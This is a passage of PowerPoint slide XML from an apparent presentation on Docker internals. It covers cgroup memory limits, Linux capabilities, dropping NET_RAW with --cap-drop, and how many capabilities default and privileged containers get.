        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038541" y="2991184"/>
            <a:ext cx="10330527" cy="2527545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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277077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t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Cgroups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137516" y="1259877"/>
            <a:ext cx="10063884" cy="2427196"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2200" dirty="0" smtClean="0"/>
              <a:t>Control the resource utilization and keep a limit on the memory CPUs etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run -d --name restricted-mem --memory 100m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myfirstimage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>This would allow up to 100mb to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>myfirstimage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987513" y="3494312"/>
            <a:ext cx="10363889" cy="2634028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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061168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pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836611" y="353315"/>
            <a:ext cx="10515600" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security: Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="9905999" cy="3541714"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ability of the kernel to break down root privileges is Capability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_CHOWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – allows root user to make changes to file UIDs and GUIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_DAC_OVERRIDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– allows roots user to bypass kernel permission on file read, write and execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_NET_RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– used by ping command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drop capabilities – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_NET_RAW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run --cap-drop NET_RAW -d -it ab0d83586b6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exec -it &lt;container-id&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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54857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t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1796143"/>
            <a:ext cx="9905999" cy="3995058"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0" smtClean="0"/>
              <a:t>Container running with default capabilities – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14 capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1800915" y="2371194"/>
            <a:ext cx="8586991" cy="3420007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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45942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t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1796143"/>
            <a:ext cx="9905999" cy="3995058"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0"/>
              <a:t>Container running with capabilities with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>flag – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>38 capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398147" y="2728202"/>
            <a:ext cx="11596256" cy="2728313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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481348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t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="642736"/>
            <a:ext cx="3584379" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>History of Containers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Containers vs VMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Basics and architecture w/demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Docker Internals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Namespaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cgroups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
